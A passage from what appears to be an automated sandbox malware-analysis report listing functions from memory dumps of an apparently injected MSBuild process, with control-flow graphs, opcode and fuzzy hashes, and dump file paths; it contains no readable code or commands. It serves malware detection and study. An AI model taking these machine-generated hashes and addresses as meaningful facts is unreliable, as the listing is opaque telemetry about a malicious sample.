                                                          control_flow_graph 1170 1356ca5-1356d0f 1172 1356d11-1356d3c 1170->1172 1173 1356d7a-1356d7e 1170->1173 1180 1356d6c 1172->1180 1181 1356d3e-1356d40 1172->1181 1174 1356d80-1356da3 1173->1174 1175 1356da9-1356db4 1173->1175 1174->1175 1177 1356db6-1356dbe 1175->1177 1178 1356dc0-1356de7 1175->1178 1177->1178 1184 1356ded-1356dfb 1178->1184 1185 1356d71-1356d74 1180->1185 1182 1356d62-1356d6a 1181->1182 1183 1356d42-1356d4c 1181->1183 1182->1185 1187 1356d50-1356d5e 1183->1187 1188 1356d4e 1183->1188 1189 1356e04-1356e1a 1184->1189 1190 1356dfd-1356e03 1184->1190 1185->1173 1187->1187 1193 1356d60 1187->1193 1188->1187 1191 1356e30-1356e57 1189->1191 1192 1356e1c-1356e28 1189->1192 1190->1189 1197 1356e67 1191->1197 1198 1356e59-1356e5d 1191->1198 1192->1191 1193->1182 1201 1356e68 1197->1201 1198->1197 1199 1356e5f-1356e62 call 1350a00 1198->1199 1199->1197 1201->1201
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2591920837.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1350000_MSBuild.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: dyqJ$dyqJ
                                                          • API String ID: 0-3410880094
                                                          • Opcode ID: 3ea200c38358ec94f52b305e8d861796dde816be3b481a97c139b8227c82fb01
                                                          • Instruction ID: 6739ef1a2e40346424fa053de71187a3a304b67e97cf907b143aa468e07a231e
                                                          • Opcode Fuzzy Hash: 3ea200c38358ec94f52b305e8d861796dde816be3b481a97c139b8227c82fb01
                                                          • Instruction Fuzzy Hash: F55114B0D102188FEB54CFA9C885B9DBBF1FF48B14F54852AE819AB350DB74A844CF95
                                                          Function 01356CB0 Relevance: 2.6, Strings: 2, Instructions: 132COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1202 1356cb0-1356d0f 1203 1356d11-1356d3c 1202->1203 1204 1356d7a-1356d7e 1202->1204 1211 1356d6c 1203->1211 1212 1356d3e-1356d40 1203->1212 1205 1356d80-1356da3 1204->1205 1206 1356da9-1356db4 1204->1206 1205->1206 1208 1356db6-1356dbe 1206->1208 1209 1356dc0-1356de7 1206->1209 1208->1209 1215 1356ded-1356dfb 1209->1215 1216 1356d71-1356d74 1211->1216 1213 1356d62-1356d6a 1212->1213 1214 1356d42-1356d4c 1212->1214 1213->1216 1218 1356d50-1356d5e 1214->1218 1219 1356d4e 1214->1219 1220 1356e04-1356e1a 1215->1220 1221 1356dfd-1356e03 1215->1221 1216->1204 1218->1218 1224 1356d60 1218->1224 1219->1218 1222 1356e30-1356e57 1220->1222 1223 1356e1c-1356e28 1220->1223 1221->1220 1228 1356e67 1222->1228 1229 1356e59-1356e5d 1222->1229 1223->1222 1224->1213 1232 1356e68 1228->1232 1229->1228 1230 1356e5f-1356e62 call 1350a00 1229->1230 1230->1228 1232->1232
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2591920837.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1350000_MSBuild.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: dyqJ$dyqJ
                                                          • API String ID: 0-3410880094
                                                          • Opcode ID: df7d0860e8cbdd38998f4b5505b995397995ae1d563c89e2f044845c1fd44751
                                                          • Instruction ID: 7c89630fe2ceec952252ed56a9a521682cce7e6d643c113854b4f697936db473
                                                          • Opcode Fuzzy Hash: df7d0860e8cbdd38998f4b5505b995397995ae1d563c89e2f044845c1fd44751
                                                          • Instruction Fuzzy Hash: 7E5124B0D102188FEB58CFA9C885B9DBBF1BF48B14F54851AE819BB350DB74A844CF95
                                                          Function 013526B0 Relevance: 1.3, Strings: 1, Instructions: 90COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1845 13526b0-135270d 1847 1352715-135276d 1845->1847 1848 135270f-1352712 1845->1848 1851 1352773-1352781 1847->1851 1848->1847 1852 1352783-1352789 1851->1852 1853 135278a-13527de 1851->1853 1852->1853 1860 13527e0 1853->1860 1861 13527e8 1853->1861 1860->1861 1862 13527e9 1861->1862 1862->1862
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2591920837.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1350000_MSBuild.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: dyqJ
                                                          • API String ID: 0-1846348974
                                                          • Opcode ID: 3a0ce7c88af4b7cda347a71491e35bda5bd4fa15cbbf73abf4dda70d7f551d7f
                                                          • Instruction ID: a4971e2c02203f46b27b10807fcca89b964981c3b1952d8339fb05d3c5b99051
                                                          • Opcode Fuzzy Hash: 3a0ce7c88af4b7cda347a71491e35bda5bd4fa15cbbf73abf4dda70d7f551d7f
                                                          • Instruction Fuzzy Hash: 7541EFB5D00349DFDB14CFA9C884ADEBBF5BF48714F148029E809AB250DB75A949CF90
                                                          Function 013526A4 Relevance: 1.3, Strings: 1, Instructions: 89COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1863 13526a4-135270d 1865 1352715-1352720 1863->1865 1866 135270f-1352712 1863->1866 1867 1352728-135273e 1865->1867 1866->1865 1868 1352745-135276d 1867->1868 1869 1352773-1352781 1868->1869 1870 1352783-1352789 1869->1870 1871 135278a-13527de 1869->1871 1870->1871 1878 13527e0 1871->1878 1879 13527e8 1871->1879 1878->1879 1880 13527e9 1879->1880 1880->1880
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2591920837.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1350000_MSBuild.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: dyqJ
                                                          • API String ID: 0-1846348974
                                                          • Opcode ID: b2f6ef444efdf6e68b601c274d4b64cacf15d4c5ee55242391b15ead9e36aa69
                                                          • Instruction ID: 3e5a2d6a5834bb53fd0e37ba512eebc8853fdf86219e81944de5d7cb2b564f4e
                                                          • Opcode Fuzzy Hash: b2f6ef444efdf6e68b601c274d4b64cacf15d4c5ee55242391b15ead9e36aa69
                                                          • Instruction Fuzzy Hash: 4D4100B5D00349DFDB14CFA9C584ADEBBF5BF48304F148029E809AB254DB759989CF90
                                                          Function 01357988 Relevance: .6, Instructions: 558COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2591920837.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1350000_MSBuild.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 55ec28374773f3dd64d55e75d4d25bba5878b6d2ea9e10e25c5fdc9a7d7dc43e
                                                          • Instruction ID: 756d3075417c051838f82ce92278e1e58d642f44177fb661f1e73579a6a43a2d
                                                          • Opcode Fuzzy Hash: 55ec28374773f3dd64d55e75d4d25bba5878b6d2ea9e10e25c5fdc9a7d7dc43e
                                                          • Instruction Fuzzy Hash: F8125F707102028FDB26BB38E45476CBBAAFB89754F518A29E405CF355CF76EC468B81
                                                          Function 013593E4 Relevance: .4, Instructions: 388COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2591920837.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1350000_MSBuild.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 50118dee179a57def944a65e30bcf5fa4edee3f5edd04b6bd4430d6456eb57cd
                                                          • Instruction ID: 3c882a73f241d8fb6c0f2402e09d3ad5ab60e9288199dd2e57964fd13720eaf7
                                                          • Opcode Fuzzy Hash: 50118dee179a57def944a65e30bcf5fa4edee3f5edd04b6bd4430d6456eb57cd
                                                          • Instruction Fuzzy Hash: 70E18E35A00204CFDB55DFA8D594BADBBB2EF89718F248469E806EB391DB35DC41CB90
                                                          Function 01359760 Relevance: .4, Instructions: 361COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2591920837.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1350000_MSBuild.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5cf7098defa6af66fc2674fb0d155725c10c5a7c95f905f56130b94d0a769f0d
                                                          • Instruction ID: a2b7deac7f42a750d8f1ec2a4d00a7633a7457fbbb623831bc3e3c3510c29451
                                                          • Opcode Fuzzy Hash: 5cf7098defa6af66fc2674fb0d155725c10c5a7c95f905f56130b94d0a769f0d
                                                          • Instruction Fuzzy Hash: FBD1BF71A00205CFDB55CFA8D884BAEBBB2FF88718F14856AE909DB391D771D841CB91
                                                          Function 01356E9F Relevance: .1, Instructions: 149COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2591920837.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1350000_MSBuild.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 74ad50434544cbc6183f32e41dfb8c26b7bc1f4427a893b9cbb37acfe2762b55
                                                          • Instruction ID: 15e4f4a9756c2ac92ed192699c75df80a3875f3d67294b0860ec4139b0bb71f8
                                                          • Opcode Fuzzy Hash: 74ad50434544cbc6183f32e41dfb8c26b7bc1f4427a893b9cbb37acfe2762b55
                                                          • Instruction Fuzzy Hash: E551C570F102198FDB65DBB9C414BAEBBB6FF85B04F50852AE805EB381DB719846CB50
                                                          Function 01351108 Relevance: .1, Instructions: 129COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2591920837.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1350000_MSBuild.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d5674ecf418898f1ef8e4125e5dee5195da71b5416e6e2182500c523ea8246c1
                                                          • Instruction ID: d41222380b096e5c7fcbfba3db8b40288809516958a90ea609da9711380c0fb8
                                                          • Opcode Fuzzy Hash: d5674ecf418898f1ef8e4125e5dee5195da71b5416e6e2182500c523ea8246c1
                                                          • Instruction Fuzzy Hash: 28516E712063C1CFC706FB28F881B593B7ABB8630470489A9D040CF66EDAB56D09CF85
                                                          Function 0135F47D Relevance: .1, Instructions: 112COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2591920837.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1350000_MSBuild.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 30c4f12b19f9f31e71612345d4218207fd0d94d9370a57ea0090c1cad1e24e04
                                                          • Instruction ID: b67966bd454102e9c8160f3ee76c7f33eb856cc12181828d20368a4c6ecb4374
                                                          • Opcode Fuzzy Hash: 30c4f12b19f9f31e71612345d4218207fd0d94d9370a57ea0090c1cad1e24e04
                                                          • Instruction Fuzzy Hash: D7312530B00205CFDB16AF38D11876E3BF6AF88648B144968D406EB345EF35CC06CB90
                                                          Function 01351138 Relevance: .1, Instructions: 100COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2591920837.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1350000_MSBuild.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: bc8f03053d5328f8edab0dfc7e0309d915efe143ec43fe2f6336470917ca64e5
                                                          • Instruction ID: b5ed30ea63b347b002a9951712c30842309fbd74cadb569d056882e3e3dba5e0
                                                          • Opcode Fuzzy Hash: bc8f03053d5328f8edab0dfc7e0309d915efe143ec43fe2f6336470917ca64e5
                                                          • Instruction Fuzzy Hash: 1741D770206285CFD716FB28F882B693B6EB7953043049AA9D051CF66EDAB16D05CF85
                                                          Function 01356F40 Relevance: .1, Instructions: 97COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2591920837.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1350000_MSBuild.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 56f4655a5a6dda1a31b4d766c44394e7b18cdf69d829fb51527cffc781387b29
                                                          • Instruction ID: f1bd0b0a1f7f1a83b9368a7ca794132e96387167f6e8a8f798f71f40ca907621
                                                          • Opcode Fuzzy Hash: 56f4655a5a6dda1a31b4d766c44394e7b18cdf69d829fb51527cffc781387b29
                                                          • Instruction Fuzzy Hash: AC319270E10209CBEB65CFA9C851B9EBBBAFF85704F908526E805EB340E771D845CB40
                                                          Function 0135F340 Relevance: .1, Instructions: 96COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2591920837.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1350000_MSBuild.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 874809311ded30664eeaa2bb5e4e159de11e23aa90a49bae8dc0519ba0ba61dd
                                                          • Instruction ID: 882bd0b8807249c3168738821cfc35ab251c834fe00c5ae36f7205da7889d585
                                                          • Opcode Fuzzy Hash: 874809311ded30664eeaa2bb5e4e159de11e23aa90a49bae8dc0519ba0ba61dd
                                                          • Instruction Fuzzy Hash: D131BE35E102098BDB19CF69D494A9EBBB6FF88704F108529E806FB351DF70AC42CB50
                                                          Function 01351667 Relevance: .1, Instructions: 92COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2591920837.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1350000_MSBuild.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7626961a9ac75518550a119ebdeaf797ddf463470ce736bba5296814c02f271a
                                                          • Instruction ID: f1b4d96c037d7a3202d0f0309106ec7f2238def508b30bd42afcdfe15f3a66e1
                                                          • Opcode Fuzzy Hash: 7626961a9ac75518550a119ebdeaf797ddf463470ce736bba5296814c02f271a
                                                          • Instruction Fuzzy Hash: 143107782012444BEF62FB3CE888F6A3759EB8571CF044965D815CF35AEB35EC458BA2
                                                          Function 0135F350 Relevance: .1, Instructions: 91COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2591920837.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1350000_MSBuild.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 38dad71ad9cc44029ab202c914e42ea5d9437b10d0338a7d06b2e6d2403ab9ab
                                                          • Instruction ID: 6075fe5a9a3d037aa612928665fe42173280160e25e4a13b9614c5a3bf51a2d9
                                                          • Opcode Fuzzy Hash: 38dad71ad9cc44029ab202c914e42ea5d9437b10d0338a7d06b2e6d2403ab9ab
                                                          • Instruction Fuzzy Hash: 16317C74E102099BDB19DF69D594AAEBBB6BF88704F108529E806FB351DF70AC42CB50
                                                          Function 013592D1 Relevance: .1, Instructions: 84COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2591920837.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1350000_MSBuild.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: fe1b7c8d4c3b919e302dd495c79788f7430150734861705a52172791b062b099
                                                          • Instruction ID: f4167d3afb7f6625cc53b8240d471173a53a2116e014d8c3b31099ab1e39dac7
                                                          • Opcode Fuzzy Hash: fe1b7c8d4c3b919e302dd495c79788f7430150734861705a52172791b062b099
                                                          • Instruction Fuzzy Hash: 40319531E10209DBDB15CF69D450B9EFBB2FF89708F548629E805EB392EB719841CB90
                                                          Function 01357059 Relevance: .1, Instructions: 82COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2591920837.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1350000_MSBuild.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2ac978df1c3aa06e8fbd2a7ee86efe159e5b1304129ae46e71e844cc9ce999ca
                                                          • Instruction ID: 9f4bea663710fed79f47a8feff1a69d1ea2d2c184bd636c4aa44d5d1e7176738
                                                          • Opcode Fuzzy Hash: 2ac978df1c3aa06e8fbd2a7ee86efe159e5b1304129ae46e71e844cc9ce999ca
                                                          • Instruction Fuzzy Hash: 24210834700214CFDB09EBB4D498B6E77BBFB88714B208468D4069B3A9CF769C42DB90
                                                          Function 013592E0 Relevance: .1, Instructions: 78COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2591920837.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1350000_MSBuild.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0816bca9ee9631295ffa8b512ea969556e13abb376936bc5c0a88e46f646daf4
                                                          • Instruction ID: 6cba4be4d0ac2eef1181cbaa76f6c8b2a4cca9fe70671352a40fc95b53f3206f
                                                          • Opcode Fuzzy Hash: 0816bca9ee9631295ffa8b512ea969556e13abb376936bc5c0a88e46f646daf4
                                                          • Instruction Fuzzy Hash: 33219430E10209DBDB15CF69D450B9EFBB2FF89708F148629E805EB392EB709841CB90
                                                          Function 013591D1 Relevance: .1, Instructions: 75COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2591920837.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1350000_MSBuild.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: deb5f8ec8c7fc4f0375a4272de3930b7b888ea3d43a86536519f9765ecce3380
                                                          • Instruction ID: ab6deb727152f289c0efb96f379e813e263d2c6f7710177d04c4886578fc0f3a
                                                          • Opcode Fuzzy Hash: deb5f8ec8c7fc4f0375a4272de3930b7b888ea3d43a86536519f9765ecce3380
                                                          • Instruction Fuzzy Hash: 8021A435E00209DBCB19CFA8C450A9EF7B2AF89748F50861AEC15F7341DBB19945CB50
                                                          Function 01351840 Relevance: .1, Instructions: 74COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2591920837.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1350000_MSBuild.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6c67eaa5c743e701bb9dfb19f937355f4acd74d3ccf123f516363c830b203fe7
                                                          • Instruction ID: 3ade6065cdb4711f1bf02f4e9c45fd6ff4bebff193d29acb980d2620dc5ab2e7
                                                          • Opcode Fuzzy Hash: 6c67eaa5c743e701bb9dfb19f937355f4acd74d3ccf123f516363c830b203fe7
                                                          • Instruction Fuzzy Hash: F8219130B00209CFDB65EB78C914BAD7BF5AF49618F1005A8D951EB290DB769C41CB91
                                                          Function 010FD01C Relevance: .1, Instructions: 72COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2591757382.00000000010FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010FD000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_10fd000_MSBuild.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 205f3986e7d66b0dd15ddf916751b7002a58b70d03d8d07e8cb940e245967a00
                                                          • Instruction ID: 85181016384a92e66699ee73053236ecc3f0e5c932404ccdbb8131c03ae11c10
                                                          • Opcode Fuzzy Hash: 205f3986e7d66b0dd15ddf916751b7002a58b70d03d8d07e8cb940e245967a00
                                                          • Instruction Fuzzy Hash: 0C213771504340DFDB15DF54D4C0B1ABBA5FB84314F24C5ADEA8A4B682C336D407CB62
                                                          Function 01351342 Relevance: .1, Instructions: 71COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2591920837.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1350000_MSBuild.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f7d3b9dd072a4f394153c2d223f7435303fc4f545064d80797fa8b17ccfd7a47
                                                          • Instruction ID: d65dad8b282bc439a6d7891047af3bc50d4b2cd0b058efc0fedc0141d35d398b
                                                          • Opcode Fuzzy Hash: f7d3b9dd072a4f394153c2d223f7435303fc4f545064d80797fa8b17ccfd7a47
                                                          • Instruction Fuzzy Hash: AC21D2746002418BEB72272CE4A8B6C3B21EB47719F000479E806DB386CB6A8885C742
                                                          Function 013591E0 Relevance: .1, Instructions: 70COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2591920837.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1350000_MSBuild.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 42bb36823cafd9a84d3295dee2a0cd0e451d1372de3146820ccb3469890bb00b
                                                          • Instruction ID: 5cb8edba2a6e969f2dab238de0b1c3d52c4e5a953c4d1e987f4f8064ae0531bd
                                                          • Opcode Fuzzy Hash: 42bb36823cafd9a84d3295dee2a0cd0e451d1372de3146820ccb3469890bb00b
                                                          • Instruction Fuzzy Hash: 79218030E00209DBDB19CFA8C454A9EF7B2AF89748F10862AEC15BB341DBB09841CB50
                                                          Function 01351850 Relevance: .1, Instructions: 70COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2591920837.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1350000_MSBuild.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d3c6721f4c9c55900f019c690993336cead5b14f4ec35f9a0c0cc57b12f2a839
                                                          • Instruction ID: 7a808a9b68725cd8eb7f97f165073c00db456c3a877c5609d4577a8496c195f2
                                                          • Opcode Fuzzy Hash: d3c6721f4c9c55900f019c690993336cead5b14f4ec35f9a0c0cc57b12f2a839
                                                          • Instruction Fuzzy Hash: CB213D30B00209CFDBA4EB78C914BAE77F6AB4D648F200469D906EB394DB769C41CB91
                                                          Function 01354F52 Relevance: .1, Instructions: 70COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2591920837.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1350000_MSBuild.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c8c0becdd3ade62fc61f38719ad549c48c3c6071ced9c770bde32503208d8135
                                                          • Instruction ID: 36106611ea687ad74da4e4cd509806956952826ccfa80e8d5ebb22514d63f398
                                                          • Opcode Fuzzy Hash: c8c0becdd3ade62fc61f38719ad549c48c3c6071ced9c770bde32503208d8135
                                                          • Instruction Fuzzy Hash: A1217C34B00105CFDB99EB38D658B9D7BF1EF4C644B1004A8E806EB3A4EB359D41CB51
                                                          Function 01351678 Relevance: .1, Instructions: 69COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2591920837.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1350000_MSBuild.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5dcc3f9fbaeb4a37707a3de79de2c9f134ee02ecbf8bb389061f42818762660e
                                                          • Instruction ID: de9c65d405dd26d5a26378ccedf1dc7192a17a20352efcfb4d3690a41f571023
                                                          • Opcode Fuzzy Hash: 5dcc3f9fbaeb4a37707a3de79de2c9f134ee02ecbf8bb389061f42818762660e
                                                          • Instruction Fuzzy Hash: 762172786012404BEF62FB2CE884B293769EB89719F104965D816CF35ADA35EC458BA1
                                                          Function 01354F60 Relevance: .1, Instructions: 68COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2591920837.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1350000_MSBuild.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ff8b803a4e77669dbea9cf08da6f9f4016be50a816835faf65328fe30a6ce3ea
                                                          • Instruction ID: 3651e19d249b8c52e410f9916003dae957cee6727aa03b748c2091d58c127d7e
                                                          • Opcode Fuzzy Hash: ff8b803a4e77669dbea9cf08da6f9f4016be50a816835faf65328fe30a6ce3ea
                                                          • Instruction Fuzzy Hash: 69212834B00205CFDB58EB78C658BAE77F5EB4C644B104468E906EB3A4EB759D41CB91
                                                          Function 0135178A Relevance: .1, Instructions: 62COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2591920837.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1350000_MSBuild.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7f3d273b21333940e65fa9493c665ad3fe6873bf00d78e95839c5b358ae58a4d
                                                          • Instruction ID: 2330babfbc17f57393edadcf1f1f210cebeb4268abf557f7f9c161e68a2cce9d
                                                          • Opcode Fuzzy Hash: 7f3d273b21333940e65fa9493c665ad3fe6873bf00d78e95839c5b358ae58a4d
                                                          • Instruction Fuzzy Hash: 4211A076B002599BCF61AA7C984875FBFE9EB88B54F100865E906D7344EB35C8028BD1
                                                          Function 01350838 Relevance: .1, Instructions: 62COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2591920837.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1350000_MSBuild.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 34d62fbd8b44477e9a0463037094e4322f09cdd7a389223a7eb24880f2d9fcf0
                                                          • Instruction ID: 06a7bb897605a8f5c94ab13573e880ee41a540b340925f0ce54a2ac15386ef40
                                                          • Opcode Fuzzy Hash: 34d62fbd8b44477e9a0463037094e4322f09cdd7a389223a7eb24880f2d9fcf0
